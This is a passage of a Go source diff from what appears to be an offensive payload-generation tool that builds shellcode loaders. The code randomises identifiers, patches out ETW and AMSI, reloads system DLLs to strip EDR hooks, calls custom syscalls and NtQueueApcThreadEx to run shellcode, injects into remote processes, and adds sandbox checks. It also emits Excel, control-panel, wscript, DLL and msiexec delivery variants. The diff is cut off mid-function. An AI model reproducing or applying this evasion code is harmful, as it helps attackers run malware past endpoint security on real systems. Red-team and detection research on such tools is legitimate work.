Sandbox_DomainJoinedTemplate, err := template.New("Sandbox_DomainJoined").Parse(Struct.Sandbox_DomainJoined()) + buffer.Reset() + if err != nil { + log.Fatal(err) + } + if err := Sandbox_DomainJoinedTemplate.Execute(&buffer, Header); err != nil { + log.Fatal(err) + } + Header.Variables["Sandbox"] = buffer.String() + buffer.Reset() + } else { + Header.Variables["Sandbox"] = "" + Header.Variables["Sandboxfunction"] = "" + Header.Variables["SandboxImport"] = "" + Header.Variables["SandboxOS"] = "" + } - DLLTemplate, err := template.New("DLL").Parse(DLLStructTemplate) + HeaderTemplate, err := template.New("Header").Parse(Struct.Header()) if err != nil { log.Fatal(err) } - buffer.Reset() - if err := DLLTemplate.Execute(&buffer, DLL); err != nil { + if err := HeaderTemplate.Execute(&buffer, Header); err != nil { log.Fatal(err) } - return buffer.String(), DLL.Variables["FuncName"], DLL.Variables["FuncName"] + return buffer.String(), Header.Variables["ETW"], Header.Variables["AMSI"], Header.Variables["Versionfunc"], Header.Variables["Version"], Header.Variables["customsyscall"], Header.Variables["customsyscallVP"], Header.Variables["Sandbox"], Console.Variables["Console"], Header.Variables["PROCESS_ALL_ACCESS"], Header.Variables["WriteProcessMemory"], Header.Variables["FindAddress"], Header.Variables["RemoteETW"] } -func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string, console bool, sandbox bool, name string, ETW bool, ProcessInjection string, Sleep bool, AMSI bool) (string, string, string) { - var Structure string +func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string, console bool, sandbox bool, name string, ETW bool, ProcessInjection string, Sleep bool, AMSI bool, export string, Exec_Type string, evasion string) (string, string, string) { + var Structure, ReloadCode string + var binary bool var buffer bytes.Buffer Binary := &Binary{} - Sandboxfunction := &Sandboxfunction{} - Sandboxfunction.Variables = 
make(map[string]string) - Sandbox_DomainJoined := &Sandbox_DomainJoined{} - Sandbox_DomainJoined.Variables = make(map[string]string) Binary.Variables = make(map[string]string) - WindowsVersion := &WindowsVersion{} - WindowsVersion.Variables = make(map[string]string) + Reload := &Reload{} + Reload.Variables = make(map[string]string) + if mode == "binary" { + binary = true + Structure = Struct.Binary() + } else { + binary = false + Structure = Struct.DLL_Refresher() + if mode == "excel" { + Binary.Variables["ExportFunction"] = `` + Binary.Variables["ExportName"] = Struct.JS_Office_Export() + } + if mode == "control" { + Binary.Variables["ExportFunction"] = `` + Binary.Variables["ExportName"] = Struct.JS_Control_Export() + } + if mode == "wscript" || mode == "dll" { + Binary.Variables["ExportFunction"] = `` + Binary.Variables["ExportName"] = Struct.WS_JS_Export() + } + if mode == "dll" && export != "" { + Binary.Variables["ExportFunction"] = `//export ` + export + ` + func ` + export + `() { + Run() + }` + Binary.Variables["ExportName"] = Struct.WS_JS_Export() + } + if mode == "msiexec" { + Binary.Variables["ExportName"] = Struct.WS_JS_Export() + Binary.Variables["ExportFunction"] = `` + } + } + Header, ETWFunctionName, AMSIFunctionName, Versionfunc, Version, customsyscall, customsyscallVP, Sandbox, Console, PROCESS_ALL_ACCESS, WriteProcessMemory, FindAddress, RemoteETWFunctionName := Header_Buff(binary, AMSI, ETW, ProcessInjection, console, sandbox, evasion) + Shellcode_Exec, Shellcode_Exec_Function, Raw_Bin := Shellcode_Loader_Buff(Exec_Type, ProcessInjection, customsyscall, customsyscallVP, PROCESS_ALL_ACCESS, WriteProcessMemory, console, FindAddress, RemoteETWFunctionName) + Binary.Variables["Shellcode_Exec"] = Shellcode_Exec + Binary.Variables["Shellcode_Exec_Function"] = Shellcode_Exec_Function + Binary.Variables["raw_bin"] = Raw_Bin + Binary.Variables["Header"] = Header + Binary.Variables["ETW"] = ETWFunctionName + Binary.Variables["AMSI"] = AMSIFunctionName + 
Binary.Variables["Versionfunc"] = Versionfunc + Binary.Variables["Version"] = Version + Binary.Variables["customsyscall"] = customsyscall + Binary.Variables["customsyscallVP"] = customsyscallVP + Binary.Variables["Console"] = Console + Binary.Variables["Sandbox"] = Sandbox + Binary.Variables["Reloading"] = Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) + "()" Binary.Variables["FuncName"] = Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) - Binary.Variables["NTFuncName"] = Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) - Binary.Variables["errnoErr"] = Cryptor.VarNumberLength(4, 9) - Binary.Variables["ptr"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["buff"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["virtualAlloc"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["alloc"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["phandle"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["baseA"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["zerob"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["alloctype"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["protect"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["regionsizep"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["regionsize"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["dll"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["error"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["x"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["file"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["loaddll"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["handle"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["dllBase"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["dllOffset"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["old"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["shellcode"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["oldshellcodeperms"] = 
Cryptor.VarNumberLength(10, 19) - Binary.Variables["loader"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["DLLname"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["Reloading"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["bytes"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["Console"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["getWin"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["showWin"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["hwnd"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["show"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["SW_RESTORE"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["SW_HIDE"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["Version"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["syscall"] = Cryptor.VarNumberLength(10, 19) - - Binary.Variables["customsyscallVP"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["bytes"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["loc"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["dllOffset"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["mem"] = Cryptor.VarNumberLength(10, 19) - - Binary.Variables["Versionfunc"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["k"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["MV"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["MinV"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["syscallnumber"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["bytesdata"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["locdata"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["xdata"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["dllBasedata"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["dllOffsetdata"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["customsyscall"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["PROCESS_ALL_ACCESS"] = Cryptor.VarNumberLength(10, 19) - 
Binary.Variables["errnoERROR_IO_PENDING"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["errERROR_IO_PENDING"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["runfunc"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["oldptrperms"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["oldfartcodeperms"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["sysid"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["baseAddress"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["handlez"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["CreateProcess"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["GetModuleInformation"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["ReloadRemoteProcess"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["RemoteModuleReloading"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["Target"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["WriteProcessMemory"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["addr"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["buf"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["commandLine"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["data"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["err"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["funcNtAllocateVirtualMemory"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["funcNtCreateThreadEx"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["funcNtProtectVirtualMemory"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["funcNtWriteVirtualMemory"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["hModule"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["hProcess"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["handleSize"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["hh"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["lpBaseAddress"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["lpBuffer"] = 
Cryptor.VarNumberLength(10, 19) - Binary.Variables["lpNumberOfBytesWritten"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["mi"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["mod"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["modules"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["module"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["nLength"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["nSize"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["name"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["needed"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["n"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["offsetaddr"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["oldProtect"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["outString"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["pi"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["procEnumProcessModules"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["EnumProcessModules"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["procGetModuleBaseName"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["GetModuleBaseName"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["procGetModuleInformation"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["procWriteProcessMemory"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["process"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["rawbytes"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["raw_bin"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["s"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["si"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["size"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["startupInfo"] = Cryptor.VarNumberLength(10, 19) - b64number := Cryptor.GenerateNumer(3, 6) - Binary.Variables["b64number"] = strconv.Itoa(b64number) - Binary.Variables["decode"] = Cryptor.VarNumberLength(10, 19) - 
Binary.Variables["b64"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["decoded"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["number"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["sum"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["GetConsoleWindowName"] = Utils.StringEncode("GetConsoleWindow", b64number) - Binary.Variables["ShowWindowName"] = Utils.StringEncode("ShowWindow", b64number) - Binary.Variables["WriteProcessMemoryName"] = Utils.StringEncode("WriteProcessMemory", b64number) - Binary.Variables["MI"] = Cryptor.VarNumberLength(4, 9) - - WindowsVersion.Variables["Version"] = Binary.Variables["Version"] - WindowsVersion.Variables["syscall"] = Binary.Variables["syscall"] - WindowsVersion.Variables["customsyscall"] = Binary.Variables["customsyscall"] - WindowsVersion.Variables["customsyscallVP"] = Binary.Variables["customsyscallVP"] + Reload.Variables["customsyscallVP"] = Binary.Variables["customsyscallVP"] + Reload.Variables["customsyscall"] = Binary.Variables["customsyscall"] + Reload.Variables["Reloading"] = Binary.Variables["Reloading"] + Reload.Variables["DLLname"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["bytes"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["runfunc"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["dllBase"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["dllOffsetdata"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["dllOffset"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["dll"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["error"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["handlez"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["handle"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["loaddll"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["loc"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["mem"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["oldfartcodeperms"] = Cryptor.VarNumberLength(10, 19) + 
Reload.Variables["regionsize"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["x"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["file"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["ntPathW"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["ntPath"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["DLL"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["objectAttributes"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["KnownDll"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["fullbytes"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["rawdata"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["CleanSystemDLL"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["sztViewSize"] = Cryptor.VarNumberLength(10, 19) + + Reload.Variables["Address"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["FindAddress"] = FindAddress + Reload.Variables["NtOpenSection"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["NtMapViewOfSection"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["mxKeSFQASvbvx"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["ttttt"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["procNtOpenSection"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["procNtMapViewOfSection"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["procNtUnmapViewOfSection"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["sstring"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["KnownDLL"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["WriteMemoryfunc"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["index"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["writePtr"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["inbuf"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["destination"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["v"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["xx"] = Cryptor.VarNumberLength(10, 19) + 
Reload.Variables["handlee"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["filee"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["ddhandlez"] = Cryptor.VarNumberLength(10, 19) + Reload.Variables["loaddlll"] = Cryptor.VarNumberLength(10, 19) + + if evasion == "KnownDLL" { + if console == true { + Reload.Variables["ReloadingMessage"] = "printDebug(\"[+] Reloading: C:\\\\Windows\\\\System32\\\\\"+" + Reload.Variables["DLL"] + "+\" \")" + } else { + Reload.Variables["ReloadingMessage"] = `` + } + ReloadTemplate, err := template.New("Reload").Parse(Struct.KnownDLL_Refresh()) - buffer.Reset() - WindowsVersionTemplate, err := template.New("WindowsVersion").Parse(Struct.WindowsVersion_Syscall()) - if err != nil { - log.Fatal(err) + if err != nil { + log.Fatal(err) + } + + if err := ReloadTemplate.Execute(&buffer, Reload); err != nil { + log.Fatal(err) + } + ReloadCode = buffer.String() } - buffer.Reset() - if err := WindowsVersionTemplate.Execute(&buffer, WindowsVersion); err != nil { - log.Fatal(err) + if evasion == "Disk" { + if console == true { + Reload.Variables["ReloadingMessage"] = "printDebug(\"[+] Reloading: \"+" + Reload.Variables["DLLname"] + "[i]+\" \")" + } else { + Reload.Variables["ReloadingMessage"] = `` + } + ReloadTemplate, err := template.New("Reload").Parse(Struct.Disk_Refresh()) + if err != nil { + log.Fatal(err) + } + if err := ReloadTemplate.Execute(&buffer, Reload); err != nil { + log.Fatal(err) + } + ReloadCode = buffer.String() } - Binary.Variables["SyscallNumberlist"] = buffer.String() + if evasion == "None" { + Binary.Variables["Reloading"] = "" + Reload.Variables["ReloadingMessage"] = "" + ReloadCode = "" + } + + Binary.Variables["ReloadFunction"] = ReloadCode buffer.Reset() - if console == true && ProcessInjection == "" { - Binary.Variables["hide"] = Binary.Variables["Console"] + "(true)" - Binary.Variables["DebugImport"] = `"io" - "os" - "fmt"` - Binary.Variables["Debug"] = ` - var ( - debugWriter io.Writer - ) - - func 
printDebug(format string, v ...interface{}) { - debugWriter = os.Stdout - output := fmt.Sprintf("[DEBUG] ") - output += format +"\n" - fmt.Fprintf(debugWriter, output, v...) - } - ` - Binary.Variables["RefreshPE"] = "printDebug(\"RefreshPE failed:\", err)" - Binary.Variables["EDR"] = "printDebug(\"[+] EDR removed\")" - Binary.Variables["ShellcodeString"] = "printDebug(\"[*] Loading shellcode into a string\")" - Binary.Variables["Pointer"] = "printDebug(\"[*] Create a Pointer on stack\")" - Binary.Variables["CopyPointer"] = "printDebug(\"[*] Copy Pointer's attributes\")" - Binary.Variables["OverwrittenShellcode"] = "printDebug(\"[*] Overwriten Pointer to point to shellcode String\")" - Binary.Variables["OverWrittenPoint"] = "printDebug(\"[*] Overwriting shellcode String with Pointer's attributes\")" - Binary.Variables["ReloadingMessage"] = "printDebug(\"[+] Reloading: \"+" + Binary.Variables["DLLname"] + "+\" \")" - Binary.Variables["VersionMessage"] = "printDebug(\"[+] Detected Version: \" +" + WindowsVersion.Variables["Version"] + ")" - - } else if console == true && ProcessInjection != "" { + if console == true { Binary.Variables["hide"] = Binary.Variables["Console"] + "(true)" - Binary.Variables["DebugImport"] = `"io" - "os"` - Binary.Variables["Debug"] = ` - var ( - debugWriter io.Writer - ) - - func printDebug(format string, v ...interface{}) { - debugWriter = os.Stdout - output := fmt.Sprintf("[DEBUG] ") - output += format +"\n" - fmt.Fprintf(debugWriter, output, v...) 
- } - ` Binary.Variables["RefreshPE"] = "printDebug(\"RefreshPE failed:\", err)" Binary.Variables["EDR"] = "printDebug(\"[+] EDR removed\")" - Binary.Variables["ShellcodeString"] = "printDebug(\"[*] Loading shellcode into a string\")" - Binary.Variables["Pointer"] = "printDebug(\"[*] Create a Pointer on stack\")" - Binary.Variables["CopyPointer"] = "printDebug(\"[*] Copy Pointer's attributes\")" - Binary.Variables["OverwrittenShellcode"] = "printDebug(\"[*] Overwriten Pointer to point to shellcode String\")" - Binary.Variables["OverWrittenPoint"] = "printDebug(\"[*] Overwriting shellcode String with Pointer's attributes\")" - Binary.Variables["ReloadingMessage"] = "printDebug(\"[+] Reloading: \"+" + Binary.Variables["DLLname"] + "+\" \")" - Binary.Variables["VersionMessage"] = "printDebug(\"[+] Detected Version: \" +" + WindowsVersion.Variables["Version"] + ")" + Binary.Variables["VersionMessage"] = "printDebug(\"[+] Detected Version: \" +" + Binary.Variables["Version"] + ")" + Binary.Variables["AllocatingMessage"] = "printDebug(\"[+] Allocating a RWX section of the process\")" + Binary.Variables["RtlCopyMemoryMessage"] = "printDebug(\"[+] Copying shellcode to memory with RtlCopyMemory\")" + Binary.Variables["VirtualProtectMessage"] = "printDebug(\"[+] Calling a custom syscall version of NtProtectVirtualMemory to change memory to not writeable\")" + Binary.Variables["GetCurrentThreadMessage"] = "printDebug(\"[+] Calling GetCurrentThread to get a handle on the current process\")" + Binary.Variables["NtQueueApcThreadExMessage"] = "printDebug(\"[+] Calling NtQueueApcThreadEx to execute shellcode\")" + Binary.Variables["SyscallMessage"] = "printDebug(\"[*] Calling shellcode using a System Call\")" + + Binary.Variables["VersionMessage"] = "printDebug(\"[+] Detected Version: \" +" + Binary.Variables["Version"] + ")" Binary.Variables["PPIDMessage"] = `strpid := fmt.Sprint(` + Binary.Variables["pi"] + `.ProcessId) printDebug("[*] Creating Remote Process: " + strpid) 
@@ -687,10 +637,8 @@ func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string,
 Binary.Variables["RemoteReloading"] = "printDebug(\"[+] Interacting with Remote Process\")"
 Binary.Variables["Injecting"] = "printDebug(\"[+] Injecting Shellcode into Remote Process\")"
 Binary.Variables["Injected"] = "printDebug(\"[+] Injected!\")"
- } else {
 Binary.Variables["hide"] = Binary.Variables["Console"] + "(false)"
- Binary.Variables["DebugImport"] = ""
 Binary.Variables["Debug"] = ""
 Binary.Variables["RefreshPE"] = ""
 Binary.Variables["EDR"] = ""
@@ -709,125 +657,225 @@ func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string, Binary.Variables["RemoteReloading"] = "" Binary.Variables["Injecting"] = "" Binary.Variables["Injected"] = "" - } - if sandbox == true { - if console == true { - Binary.Variables["SandboxOS"] = "" - } else { - Binary.Variables["SandboxOS"] = `"os"` - } - Binary.Variables["IsDomainJoined"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["domain"] = Cryptor.VarNumberLength(10, 19) - Binary.Variables["status"] = Cryptor.VarNumberLength(10, 19) - SandboxFunctionTemplate, err := template.New("Sandboxfunction").Parse(Struct.Sandbox()) - if err != nil { - log.Fatal(err) - } - if err := SandboxFunctionTemplate.Execute(&buffer, Binary); err != nil { - log.Fatal(err) - } - Binary.Variables["Sandboxfunction"] = buffer.String() - Binary.Variables["checker"] = Cryptor.VarNumberLength(10, 19) - Sandbox_DomainJoinedTemplate, err := template.New("Sandbox_DomainJoined").Parse(Struct.Sandbox_DomainJoined()) - buffer.Reset() - if err != nil { - log.Fatal(err) - } - if err := Sandbox_DomainJoinedTemplate.Execute(&buffer, Binary); err != nil { - log.Fatal(err) - } - Binary.Variables["Sandbox"] = buffer.String() - buffer.Reset() - } else { - Binary.Variables["Sandbox"] = "" - Binary.Variables["Sandboxfunction"] = "" - Binary.Variables["SandboxImport"] = "" - Binary.Variables["SandboxOS"] = "" - } + Binary.Variables["AllocatingMessage"] = "" + Binary.Variables["RtlCopyMemoryMessage"] = "" + Binary.Variables["VirtualProtectMessage"] = "" + Binary.Variables["GetCurrentThreadMessage"] = "" + Binary.Variables["NtQueueApcThreadExMessage"] = "" + Binary.Variables["SyscallMessage"] = "" - if (ETW == false || AMSI == false) || ProcessInjection != "" { - WriteProcessMemory_Function, decode, WriteProcessMemory := WriteProcessMemory_Buff(Binary.Variables["b64number"], b64number) - Binary.Variables["decode"] = decode - Binary.Variables["WriteProcessMemory_Function"] = 
WriteProcessMemory_Function - Binary.Variables["WriteProcessMemory"] = WriteProcessMemory - } else { - Binary.Variables["WriteProcessMemory_Function"] = "" } - if ETW == false { - ETW_Function, ETW := ETW_Buff(b64number, Binary.Variables["decode"], Binary.Variables["WriteProcessMemory"]) - Binary.Variables["ETW"] = ETW + "()" - Binary.Variables["ETW_Function"] = ETW_Function - Binary.Variables["B64"] = `"encoding/base64"` - } else { - Binary.Variables["ETW"] = "" - Binary.Variables["ETW_Function"] = "" - Binary.Variables["B64"] = `` - } - if AMSI == false { - AMSI_Function, AMSI := AMSI_Buff(Binary.Variables["WriteProcessMemory"]) - Binary.Variables["AMSI_Function"] = AMSI_Function - Binary.Variables["AMSI"] = AMSI + "()" + if Sleep == false { + Binary.Variables["SleepSecond"] = strconv.Itoa(Cryptor.GenerateNumer(2220, 2900)) + fmt.Println("[+] Sleep Timer set for " + Binary.Variables["SleepSecond"] + " milliseconds ") } else { - Binary.Variables["AMSI_Function"] = "" - Binary.Variables["AMSI"] = "" + Binary.Variables["SleepSecond"] = "0" } - if ETW == false || AMSI == false { - Binary.Variables["HEX_Import"] = `"encoding/hex"` - } else { - Binary.Variables["HEX_Import"] = `` + BinaryTemplate, err := template.New("Binary").Parse(Structure) + if err != nil { + log.Fatal(err) } - if AMSI == false { - AMSI_Function, AMSI := AMSI_Buff(Binary.Variables["WriteProcessMemory"]) - Binary.Variables["AMSI_Function"] = AMSI_Function - Binary.Variables["AMSI"] = AMSI + "()" - - } else { - Binary.Variables["AMSI_Function"] = "" - Binary.Variables["AMSI"] = "" + if err := BinaryTemplate.Execute(&buffer, Binary); err != nil { + log.Fatal(err) } + return buffer.String(), Binary.Variables["FuncName"], Binary.Variables["NTFuncName"] +} - if ETW == false || AMSI == false { - Binary.Variables["HEX_Import"] = `"encoding/hex"` +func Shellcode_Loader_Buff(Exec_Type string, ProcessInjection string, customsyscall string, customsyscallVP string, PROCESS_ALL_ACCESS string, WriteProcessMemory 
string, console bool, FindAddress string, RemoteETWFunctionName string) (string, string, string) {
+ var buffer bytes.Buffer
+ var Structure string
+ Shellcode_Loader := &Shellcode_Loader{}
+ Shellcode_Loader.Variables = make(map[string]string)
+
+ Shellcode_Loader.Variables["FunctionName"] = Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["customsyscall"] = customsyscall
+ Shellcode_Loader.Variables["customsyscallVP"] = customsyscallVP
+
+ //Syscall_RtlCopy
+ Shellcode_Loader.Variables["regionsize"] = Cryptor.VarNumberLength(4, 9)
+ Shellcode_Loader.Variables["errnoErr"] = Cryptor.VarNumberLength(4, 9)
+ Shellcode_Loader.Variables["ptr"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["alloc"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["phandle"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["baseA"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["zerob"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["alloctype"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["protect"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["regionsize"] = Cryptor.VarNumberLength(4, 9)
+
+ //Syscall_Alloc
+ Shellcode_Loader.Variables["raw_bin"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["phandle"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["baseA"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["zerob"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["alloctype"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["protect"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["regionsizep"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["regionsize"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["ptr"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["buff"] = Cryptor.VarNumberLength(10, 19)
+
+
//Syscall_RtlCopy
+ Shellcode_Loader.Variables["kernel32"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["ntdll"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["VirtualAlloc"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["RtlCopyMemory"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["regionsizep"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["GetCurrentThread"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["thread"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["NtQueueApcThreadEx"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["FindAddress"] = FindAddress
+
+ //Process Injection
+ Shellcode_Loader.Variables["RemoteETW"] = RemoteETWFunctionName
+ Shellcode_Loader.Variables["file"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["handle"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["old"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["shellcode"] = Cryptor.VarNumberLength(10, 19)
+ Shellcode_Loader.Variables["oldshellcodeperms"] = Cryptor.VarNumberLength(10, 19)
